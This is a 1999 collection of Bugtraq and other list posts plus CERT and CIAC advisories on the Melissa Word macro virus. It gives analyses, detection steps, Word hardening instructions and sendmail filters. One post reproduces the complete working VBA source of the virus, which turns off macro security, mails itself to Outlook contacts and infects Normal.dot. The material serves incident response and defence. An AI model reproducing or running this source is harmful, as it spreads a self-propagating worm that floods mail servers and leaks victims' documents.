Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent a new threat, just a new example of an already existing one, but this one is getting enough play to warrant a message.

There is a new Word macro virus circulating called Melissa. The virus propagates via email. Attached to the email is a Word file that when opened will launch a macro that will send the same message to the first 50 recipients of your Outlook address book. The subject line is "Important Message From ". The body consists of the text "Here is that document you asked for... don't show anyone else;-)". The infected documents contain passwords to porn web sites.

For more information check out:

http://vil.mcafee.com/vil/vm10120.asp

As this thing is emailing itself to everyone under the sun, virus vendors should have no problem obtaining copies to analyze. If anyone wants a copy send me a message.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 18:01:13 -0800
From: Nate Lawson
To: BUGTRAQ@netspace.org
Subject: Melissa virus code

Sorry to add one more message to this. I placed the code up on my site, formatted so that it is readable.
http://www.root.org/

-Nate

[http://www.root.org/melissa_virus.txt]

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
    If UngaDasOutlook = "Outlook" Then
        DasMapiName.Logon "profile", "password"
        For y = 1 To DasMapiName.AddressLists.Count
            Set AddyBook = DasMapiName.AddressLists(y)
            x = 1
            Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
            For oo = 1 To AddyBook.AddressEntries.Count
                Peep = AddyBook.AddressEntries(x)
                BreakUmOffASlice.Recipients.Add Peep
                x = x + 1
                If x > 50 Then oo = AddyBook.AddressEntries.Count
            Next oo
            BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
            BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
            BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
            BreakUmOffASlice.Send
            Peep = ""
        Next y
        DasMapiName.Logoff
    End If
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2

If ADI1.Name <> "Melissa" Then
    If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
    Set ToInfect = ADI1
    ADI1.Name = "Melissa"
    DoAD = True
End If

If NTI1.Name <> "Melissa" Then
    If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
    Set ToInfect = NTI1
    NTI1.Name = "Melissa"
    DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
    Do While ADI1.CodeModule.Lines(1, 1) = ""
        ADI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
    Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
        BGN = BGN + 1
    Loop
End If

If DoAD = True Then
    Do While NTI1.CodeModule.Lines(1, 1) = ""
        NTI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
    Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
        BGN = BGN + 1
    Loop
End If

CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
    ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 17:51:49 -0800
From: Nate Lawson
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Here is my analysis of how the virus works. The McAfee article aleph1 posted neglects to mention that it infects the active document and Normal.dot

1. Check for Word security controls and disable them:
   Word 2000
     Macro.Security... = FALSE
   Word 97
     Options.ConfirmConversions = 0
     Options.VirusProtection = 0
     Options.SaveNormalPrompt = 0

2. See if machine is already infected
   Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by Kwyjibo"

3. If it wasn't already infected, go through the Outlook addressbook and send mail to the first 50 names
     Subject: Important Message From
     Body: Here is that document you asked for... don't show anyone else ;-)
     Attachment: itself, named "list.doc"
   After sending the mail, add the registry key to disable further infection.

4. Open the Active Document and Normal.dot and infect them with itself

5. On the way out, check if the current day equals the current minute. If so, print "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

It does not appear to do anything malicious other than shutting down your mail server with tons of mail as users start opening the attachment. It appears the virus vendors have a patch out now. To avoid infection, disable macros when opening any Word document or just don't open the attachment.

Thanks to Josh Siegel for sending me the code.

-Nate

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:00:35 -0800
From: "Kuo, Jimmy"
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Nate Lawson does a wonderful writeup to which I will make minor clarifications:

>Here is my analysis of how the virus works.
>The McAfee article aleph1 posted neglects to mention that it infects the
>active document and Normal.dot

[Hide face] In all the clamor over the spreading aspect, we forgot to tell people that it's a normal macro virus in all other means. And that if you don't have Outlook, breathe calm. But if you do have Outlook, WATCH OUT!

"infects the active document" is redundant. It's infected. That's what starts this.

>1. Check for Word security controls and disable them:
>   Word 2000
>     Macro.Security... = FALSE
>   Word 97
>     Options.ConfirmConversions = 0
>     Options.VirusProtection = 0
>     Options.SaveNormalPrompt = 0
>2. See if machine is already infected
>   Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by Kwyjibo"
>3. If it wasn't already infected, go through the Outlook addressbook and
>send mail to the first 50 names

First 50 names of every addressbook. And the kicker? Look at the first 50 names in your address books? How many mailing lists are there?

>     Subject: Important Message From
>     Body: Here is that document you asked for... don't show anyone else ;-)
>     Attachment: itself, named "list.doc"

This time. We have discovered that it was posted to alt.sex in a file named LIST.ZIP.

>   After sending the mail, add the registry key to disable further infection.

Disables future mailings. Infections can happen again. But the email blast will happen only the first time, unless you clean the registry. So we recommend that you do not remove that element of the registry.

>4. Open the Active Document and Normal.dot and infect them with itself
>5. On the way out, check if the current day equals the current minute.
>If so, print "Twenty-two points, plus triple-word-score, plus fifty points
>for using all my letters. Game's over. I'm outta here."
>It does not appear to do anything malicious other than shutting down your
>mail server with tons of mail as users start opening the attachment. It
>appears the virus vendors have a patch out now. To avoid infection,
>disable macros when opening any Word document or just don't open the
>attachment. Thanks to Josh Siegel for sending me the code.

Good ideas.

Jimmy Kuo
Director, AV Research, Network Associates (or as he says, McAfee)
jkuo@nai.com

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:24:47 -0800
From: Aaron Wood
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)

On a lighter side... MSNBC speculates as to the origin of the hacker's name.

"Kwyjibo appears to be a reference to a "Simpsons" TV show episode in which Bart Simpson wins a Scrabble game by spelling out the word Kwyjibo. The virus also includes a line from that episode: "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

AW

-----Original Message-----
From: Dan Schrader [mailto:Dan_Schrader@trendmicro.com]
Sent: Friday, March 26, 1999 6:56 PM
To: 'Aaron Wood'; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: RE: [BugTraq] Melissa Macro Virus (fwd)

This is a serious event. A number of major companies - including Microsoft and Intel - have told the press that they had to temporarily shut down their e-mail systems due to this virus. At least 25 major companies have contacted Trend Micro about this today alone.

Trend Micro has a free tool for scanning your exchange servers to ensure that they are not harboring any infected documents. The tool, called HouseCall for Microsoft Exchange, is available at:

http://housecall.antivirus.com/smex_housecall/

This detects, but does not cure infected files. HouseCall for Exchange is an ActiveX Control - so you need Microsoft IE with security settings set to medium or low to run it. Considering this audience, I suspect you will want to remember to set those settings back when you are done.
Trend also offers a tool for scanning individual machines:

http://housecall.antivirus.com

Virus Description:

This virus works with both Word 97 and Word 2000 and the macro activates when an infected document is closed. If it is activated in Word 2000, it will lower the security setting to the lowest level by modifying the registry and will disable the Word menu commands (Macro\Security) which allow the user to reinstate security settings. In Word 97, the virus disables the Tools/Macro menu commands, the Confirm Conversions option, the MS Word macro virus protection, and the Save Normal Template prompt.

The virus then checks to see if the registry key "HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value ". . . by Kwyjibo." This is how the virus determines whether it has activated on this system.

The virus then opens Outlook, if present on the system, and sends one email for each address list. The email may contain up to 50 recipients. The email will contain the subject line: "Important Message From {user name}" and the message body will be "Here is that document you asked for . . . don't show anyone else :-)" The virus then attaches a copy of the infected active document to the outgoing mail. The name of the original infected attachment was List.doc, but it could be any name. If the user does not have Outlook, the virus will not work.

Then the virus modifies the value of the registry key mentioned above so it is equal to ". . . by Kwyjibo" -- indicating that it has successfully activated on this computer.

After that, the virus checks to see if the normal template and active document are infected, and if either is not, it infects the file.

Finally, if the day of the month is equal to the minute (for example, if it is March 26 at 3:26 pm), the virus will type the following text on the active document: "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

Trend Micro has detection for this virus in its latest pattern update, "510". Users are encouraged to download and install this latest pattern update. The protection will also be included in the regular weekly update.

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 07:07:20 -0500
From: CERT Advisory
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.04 - Melissa Macro Virus

CERT Advisory CA-99-04-Melissa-Macro-Virus

   Original issue date: Saturday March 27 1999
   Last Revised: Saturday March 27, 1999

Systems Affected

   * Machines with Microsoft Word 97 or Word 2000
   * Any mail handling system could experience performance problems or a denial of service as a result of the propagation of this macro virus.

Overview

   At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began receiving reports of a Microsoft Word 97 and Word 2000 macro virus which is propagating via email attachments. The number and variety of reports we have received indicate that this is a widespread attack affecting a variety of sites.

   Our analysis of this macro virus indicates that human action (in the form of a user opening an infected Word document) is required for this virus to propagate. It is possible that under some mailer configurations, a user might automatically open an infected document received in the form of an email attachment. This macro virus is not known to exploit any new vulnerabilities. While the primary transport mechanism of this virus is via email, any way of transferring files can also propagate the virus.

   Anti-virus software vendors have called this macro virus the Melissa macro or W97M_Melissa virus.

I. Description

   The Melissa macro virus propagates in the form of an email message containing an infected Word document as an attachment.
   The transport message has most frequently been reported to contain the following Subject header:

      Subject: Important Message From

   Where is the full name of the user sending the message.

   The body of the message is a multipart MIME message containing two sections. The first section of the message (Content-Type: text/plain) contains the following text.

      Here is that document you asked for ... don't show anyone else ;-)

   The next section (Content-Type: application/msword) was initially reported to be a document called "list.doc". This document contains references to pornographic web sites. As this macro virus spreads we are likely to see documents with other names. In fact, under certain conditions the virus may generate attachments with documents created by the victim.

   When a user opens an infected .doc file with Microsoft Word97 or Word2000, the macro virus is immediately executed if macros are enabled.

   Upon execution, the virus first lowers the macro security settings to permit all macros to run when documents are opened in the future. Therefore, the user will not be notified when the virus is executed in the future.

   The macro then checks to see if the registry key "HKEY_Current_User\Software\Microsoft\Office\Melissa?" has a value of "... by Kwyjibo". If that registry key does not exist or does not have a value of "... by Kwyjibo", the virus proceeds to propagate itself by sending an email message in the format described above to the first 50 entries in every MAPI address book readable by the user executing the macro. Keep in mind that if any of these email addresses are mailing lists, the message will be delivered to everyone on the mailing lists. In order to successfully propagate, the affected machine must have Microsoft Outlook installed; however, Outlook does not need to be the mailer used to read the message.

   Next, the macro virus sets the value of the registry key to "... by Kwyjibo". Setting this registry key causes the virus to only propagate once per session. If the registry key does not persist through sessions, the virus will propagate as described above once per every session when a user opens an infected document. If the registry key persists through sessions, the virus will no longer attempt to propagate even if the affected user opens an infected document.

   The macro then infects the Normal.dot template file. By default, all Word documents utilize the Normal.dot template; thus, any newly created Word document will be infected. Because unpatched versions of Word97 may trust macros in templates the virus may execute without warning. For more information please see:

      http://www.microsoft.com/security/bulletins/ms99-002.asp

   Finally, if the minute of the hour matches the day of the month at this point, the macro inserts into the current document the message "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

   Note that if you open an infected document with macros disabled and look at the list of macros in this document, neither Word97 nor Word2000 list the macro. The code is actually VBA (Visual Basic for Applications) code associated with the "document.open" method. You can see the code by going into the Visual Basic editor.

   If you receive one of these messages, keep in mind that the message came from someone who is affected by this virus and they are not necessarily targeting you. We encourage you to contact any users from which you have received such a message. Also, we are interested in understanding the scope of this activity; therefore, we would appreciate if you would report any instance of this activity to us according to our Incident Reporting Guidelines document available at:

      http://www.cert.org/tech_tips/incident_reporting.html

II. Impact

   * Users who open an infected document in Word97 or Word2000 with macros enabled will infect the Normal.dot template causing any documents referencing this template to be infected with this macro virus. If the infected document is opened by another user, the document, including the macro virus, will propagate. Note that this could cause the user's document to be propagated instead of the original document, and thereby leak sensitive information.

   * Indirectly, this virus could cause a denial of service on mail servers. Many large sites have reported performance problems with their mail servers as a result of the propagation of this virus.

III. Solutions

   * Block messages with the signature of this virus at your mail transfer agents.

     With Sendmail

     Nick Christenson of sendmail.com provided information about configuring sendmail to filter out messages that may contain the Melissa virus. This information is available from the following URL:

     ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt

   * Utilize virus scanners

     Most virus scanning tools will detect and clean macro viruses. In order to detect and clean current viruses you must keep your scanning tools up to date with the latest definition files.

     + McAfee / Network Associates
       http://vil.mcafee.com/vil/vm10120.asp
       http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp
     + Symantec
       http://www.symantec.com/avcenter/venc/data/mailissa.html
     + Trend Micro
       http://housecall.antivirus.com/smex_housecall/technotes.html

   * Encourage users at your site to disable macros in Microsoft Word

     Notify all of your users of the problem and encourage them to disable macros in Word. You may also wish to encourage users to disable macros in any product that contains a macro language as this sort of problem is not limited to Microsoft Word.

     In Word97 you can disable automatic macro execution (click Tools/Options/General then turn on the 'Macro virus protection' checkbox). In Word2000 macro execution is controlled by a security level variable similar to Internet Explorer (click on Tools/Macro/Security and choose High, Medium, or Low). In that case, 'High' silently ignores the VBA code, Medium prompts in the way Word97 does to let you enable or disable the VBA code, and 'Low' just runs it. Word2000 supports Authenticode on the VB code. In the 'High' setting you can specify sites that you trust and code from those sites will run.

   * General protection from Word Macro Viruses

     For information about macro viruses in general, we encourage you to review the document "Free Macro AntiVirus Techniques" by Chengi Jimmy Kuo which is available at:

     http://www.nai.com/services/support/vr/free.asp

Acknowledgements

   We would like to thank Jimmy Kuo of Network Associates, Eric Allman and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and Jason Garms and Karan Khanna of Microsoft for providing information used in this advisory. Additionally we would like to thank the many sites who reported this activity.

______________________________________________________________________

This document is available from: http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html.

______________________________________________________________________

CERT/CC Contact Information

   Email: cert@cert.org
   Phone: +1 412-268-7090 (24-hour hotline)
   Fax: +1 412-268-6989
   Postal address:
      CERT Coordination Center
      Software Engineering Institute
      Carnegie Mellon University
      Pittsburgh PA 15213-3890
      U.S.A.

   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

   We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key. If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

   CERT publications and other security information are available from our web site http://www.cert.org/.

   To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message.

Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in http://www.cert.org/legal_stuff.html.

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

______________________________________________________________________

Revision History

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 20:20:13 -0800
From: Jim Reavis
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

The one thing I would like to add is that the virus code actually walks through every available address list and grabs 50 recipients off of each for a separate message, so if your Outlook client is attached to an Exchange Server, it will hit the Global Address List and other available containers, where it may find large distribution lists.
I will shortly have my analysis up at http://securityportal.com/ Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com ---------------------------------------------------------------------------- Date: Sat, 27 Mar 1999 12:45:38 -0800 (PST) From: CIAC Mail User To: ciac-bulletin@rumpole.llnl.gov Subject: CIAC Bulletin J-037: W97M.Melissa Word Macro Virus [ For Public Release ] -----BEGIN PGP SIGNED MESSAGE----- __________________________________________________________ The U.S. Department of Energy Computer Incident Advisory Capability ___ __ __ _ ___ / | /_\ / \___ __|__ / \ \___ __________________________________________________________ INFORMATION BULLETIN W97M.Melissa Word Macro Virus March 27, 1999 17:00 GMT Number J-037 _____________________________________________________________________________ PROBLEM: A new Word 97 macro virus named W97M.Malissa has been detected at multiple DOE sites and is known to be spreading widely. The virus uses Microsoft Outlook to e-mail the infected document to the first 50 people from each of your Outlook address books. PLATFORM: Windows 95 or Windows NT running Microsoft Word 97 (version 8) or Word 2000 (version 9) and Microsoft Outlook. Word 98 on the Macintosh is probably not vulnerable because the virus uses the Windows registry, but that has not been verified yet. Outlook Express and other mail readers are not vulnerable. DAMAGE: It overwrites the first macro in open documents and in the normal.dot template with the macro virus code. It turns off macro detection in Word. It sends copies of the infected document to up to 50 people from each of your Outlook address books. SOLUTION: Use an updated antivirus product. Some vendors have a solution available but in many cases you must go to the vendors web site to get it. Do not depend on the automatic or live update feature of an antivirus package to get the detector for this virus. 
Additional precautions are to password protect the normal.dot file, turn on macro virus detection in Word, and DO NOT OPEN attachments to mail messages with the subject "Important Message From " and the contents "Here is that document you asked for ... don't show anyone else ;-)" without checking with the sender. Alert your computer security officers if you receive such messages. _____________________________________________________________________________ VULNERABILITY Risk of infection is high. This virus is spreading widely ASSESSMENT: within and without of the DOE complex. The risk of damage to your system is low because most users do not have macros in files and would be alerted by Word's macro detector. The risk of lostproductivity and lost mail messages is high as mail servers may have to be shut down and purged of infected mail messages. _____________________________________________________________________________ CIAC has critical information about the W97M.Melissa Word Macro Virus The W97M.Malissa Word macro virus has been seen within the DOE complex. This macro virus attaches to Word objects in Word 97 and Word 2000. Because of this method of infection, this virus will not infect older versions of Microsoft Word. When an infected document is opened, the virus checks to see if Word 97 or Word 2000 is installed and then disables the Macro toolbar. It then disables the following Word options: Confirm conversions at open. Macro virus protection. Prompt to save Normal template. Disabling these options makes it difficult to detect the virus in action. The virus next checks the value of the private registry string: HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? If that string is not equal to "... by Kwyjibo" the virus sends copies of the infected document to the first 50 people in each of your Outlook address books and then sets the registry key so it does not do this again. 
It sends copies of the infected document to others by opening a connection to Microsoft Outlook and creating an e-mail message with the subject: Important Message From where is replaced with the current Word user's name (Tools, Options command, User Information tab). The body of the message contains the following text: Here is that document you asked for ... don't show anyone else ;-) The virus then inserts the first 50 users from your Outlook address book, attaches the infected document and sends the message. It does this for however many address books you have defined in Outlook. After sending itself to the people in your address books, the virus then checks to see if it is running on a document or the Normal.dot template. If it is running on a document, it infects the Normal.dot template with a Document_Close macro that runs whenever a document is closed. If it is running on the Normal.dot template, it infects the active document with a Document_Open macro that runs whenever a document is opened. After the Normal.dot template is infected, the virus infects every document you work on as soon as you close them. If you share these documents with anyone, you will spread the virus. Finally, if the minute of the hour equals the day of the month, the virus inserts the following message at the current location in the active document. Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here. Detecting The Virus =================== Several antivirus vendors have a detection and cleaning capability for this virus; however, you must go to the vendors web site to get the scanner updates. Scanners with automatic or live update features do not yet get the update required to find and clean this virus. While we expect the detection strings to be in the automatic updates in the near future, for the next week or two you should get the scanner directly from your vendor's web site. 
We have verified that the Norton Antivirus updater obtained from the Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html) does detect the virus, the current live update does not. We have reliable information that McAfee (http://vil.mcafee.com/vil/vm10120.asp), and Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html) also have detection capabilities. If you receive an e-mail with the following subject and body, DO NOT OPEN the attachment. Subject: Important Message From Body: Here is that document you asked for ... don't show anyone else ;-) Make sure the sender is someone you know and then ask them if they really sent you the attachment before opening it. If they did not send it, do not open the attachment and contact your computer security manager. The most common name for the attached file is list1.doc but that name can change. If the following text appears in a document without your putting it there, your normal.dot template is infected and your Word program is infecting all documents when you close them. Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here. Another option to see if a system has been infected is to use Regedit and search for the following registry key: HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? If that key exists and has the value "... by Kwyjibo" the system has been infected at some time. Note that the infection may have been removed without deleting the key. This key can be deleted, but does no damage if left alone. Protecting A System =================== The first step in protecting a system is to have a current antivirus package running on your system. Be sure to update it at least once a month. Many of the newer antivirus scanners have the capability to automatically update themselves every couple of weeks. 
To protect Word from this and other Word macro viruses, first insure that Word has been patched with the Word 97 Template vulnerability patch (http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the normal.dot template file should be password protected; and third, the following Word 97 options should be enabled. Confirm conversions at open. Macro virus protection. Prompt to save Normal template. Password Protecting The Normal.dot File - - - - - --------------------------------------- To password protect the Normal.dot file in Word 97, perform these steps: 1. Start Word. 2. Choose the Tools, Macro, Visual Basic Editor command. 3. In the Project window of the Visual Basic Editor, click on Normal. 4. Choose the Tools, Normal Properties command, Protection tab. 5. Check the Lock Project for Viewing check box and type in a password twice. 6. Close the dialog box, close the Visual Basic editor. 7. Quit Word. The next time you start Word, the normal.dot template will be protected. WARNING: If you ever have to type in the password to make changes to the normal.dot file be aware that the file remains unprotected until you quit Word and restart it. Turning On Macro Virus Protection and Other Options - --------------------------------------------------- Some simple macro virus protection is built into Word 97. It does not detect specific macro viruses but only informs you if macros exist on a document you are trying to open. Macros detected by Macro Virus Protection are not necessarily a virus. However, if you are alerted to a macro attached to a document you should be extremely wary because most people do not have macros attached to their documents. Other options to set are: Confirm conversions at open. This makes Word display a dialog box if it is converting a document from one format to another. Prompt to save Normal template. This makes Word display a dialog box asking you to confirm changes to the Normal.dot template. 
    Most macro viruses hide in Normal.dot, so this lets you know that there has been a change that you may want to prevent. Changes also occur when you change the default font or one of the built-in styles.

To turn on macro virus protection and these other options, perform these steps:

1. Start Word.
2. Choose the Tools, Options command, General tab.
3. Check the Macro Virus Protection check box.
4. Check the Confirm conversions at open check box.
5. Choose the Save tab.
6. Check the Prompt to save Normal template check box.
7. Close the dialog box.

Whenever you open a document that contains macros, the macro virus protection opens a dialog box telling you that there are macros in the document and giving you the option to: open the document with the macros enabled, open the document without the macros, or cancel the open operation. You should only open a document with macros enabled if you are expecting there to be macros on that document and you know what they are supposed to do.

Detecting the Virus With a Mail Server
======================================

If a site has been infected you may need to block the virus-infected mail messages with your mail servers. The following filter was written by Scott Hutton (Lead Security Engineer, Information Technology Security Office) of Indiana University. As Scott mentions, this filter blocks all messages with the text "Important Message From" in the subject line, which may block messages that do not contain the virus. Use this filter at your own discretion.

===== start included text ======

We blocked this on our mail relays through the following additions to the sendmail.cf:

HSubject: $>CheckSubject

SCheckSubject
RImportant Message From $+	$#error $: 553 Subject Error
R$*	$@ OK

Don't forget that there are tabs before $#error and $@ OK. This will block any message where the subject begins with "Important Message From ...", which may be too rash of an action at your site.
===== end included text ======

Another filter was obtained by the CERT team from Nick Christenson of sendmail.com:

    ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt

_____________________________________________________________________________

Thanks to Scott Hutton for the preliminary analysis and for a sendmail filter.
Thanks to CERT and Nick Christenson of sendmail.com for another sendmail filter.

_____________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer security incident response team for the U.S. Department of Energy (DOE) and the emergency backup response team for the National Institutes of Health (NIH). CIAC is located at the Lawrence Livermore National Laboratory in Livermore, California. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC can be contacted at:

    Voice:    +1 925-422-8193
    FAX:      +1 925-423-8002
    STU-III:  +1 925-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites, and the NIH may contact CIAC 24-hours a day. During off hours (5PM - 8AM PST), call the CIAC voice number 925-422-8193 and leave a message, or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two Sky Page PIN numbers: the primary PIN number, 8550070, is for the CIAC duty person, and the secondary PIN number, 8550074, is for the CIAC Project Leader.

Previous CIAC notices, anti-virus software, and other information are available from the CIAC Computer Security Archive.
    World Wide Web:  http://www.ciac.org/
                     (or http://ciac.llnl.gov -- they're the same machine)
    Anonymous FTP:   ftp.ciac.org
                     (or ciac.llnl.gov -- they're the same machine)
    Modem access:    +1 (925) 423-4753 (28.8K baud)
                     +1 (925) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic publications:

1. CIAC-BULLETIN for Advisories, highest priority - time critical information, and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products.

Our mailing lists are managed by a public domain software package called Majordomo, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send the following request as the E-mail message body, substituting ciac-bulletin, spi-announce OR spi-notes for list-name:

    E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
        subscribe list-name
    e.g., subscribe ciac-bulletin

You will receive an acknowledgment email immediately with a confirmation that you will need to mail back to the addresses above, as per the instructions in the email. This is a partial protection to make sure you are really the one who asked to be signed up for the list in question.

If you include the word 'help' in the body of an email to the above address, it will also send back an information file on how to subscribe/unsubscribe, get past issues of CIAC bulletins via email, etc.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing communities receive CIAC bulletins. If you are not part of these communities, please contact your agency's response team to report incidents. Your agency's team will coordinate with CIAC. The Forum of Incident Response and Security Teams (FIRST) is a world-wide organization.
A list of FIRST member organizations and their constituencies can be obtained via WWW at http://www.first.org/.

This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes.
LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

J-026: HP-UX rpc.pcnfsd Vulnerability
J-027: Digital Unix Vulnerabilities ( at , inc )
J-028: Sun Solaris Vulnerabilities (sdtcm_convert, man/catman, CDE)
J-029: Buffer Overflows in Various FTP Servers
J-030: Microsoft BackOffice Vulnerability
J-031: Debian Linux "Super" package Buffer Overflow
J-032: Windows Backdoors Update II:
J-034: Cisco 7xx TCP and HTTP Vulnerabilities
J-035: Linux Blind TCP Spoofing
J-036: LDAP Buffer overflow against Microsoft Directory Services

----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 18:12:54 -0500 (EST)
From: Greg A. Woods
Reply-To: Phil-Sec@datasys.net
To: Phil-Sec@datasys.net
Subject: RE: Phil-Sec: `Good Times', come to life: Melissa

[ On Sunday, March 28, 1999 at 16:49:49 (-0500), ROD VERNEN wrote: ]
> Subject: RE: Phil-Sec: `Good Times', come to life: Melissa
>
> Good points. But WinWord can be configured to require confirmation
> before executing a macro. This is an area where user education is
> critical...

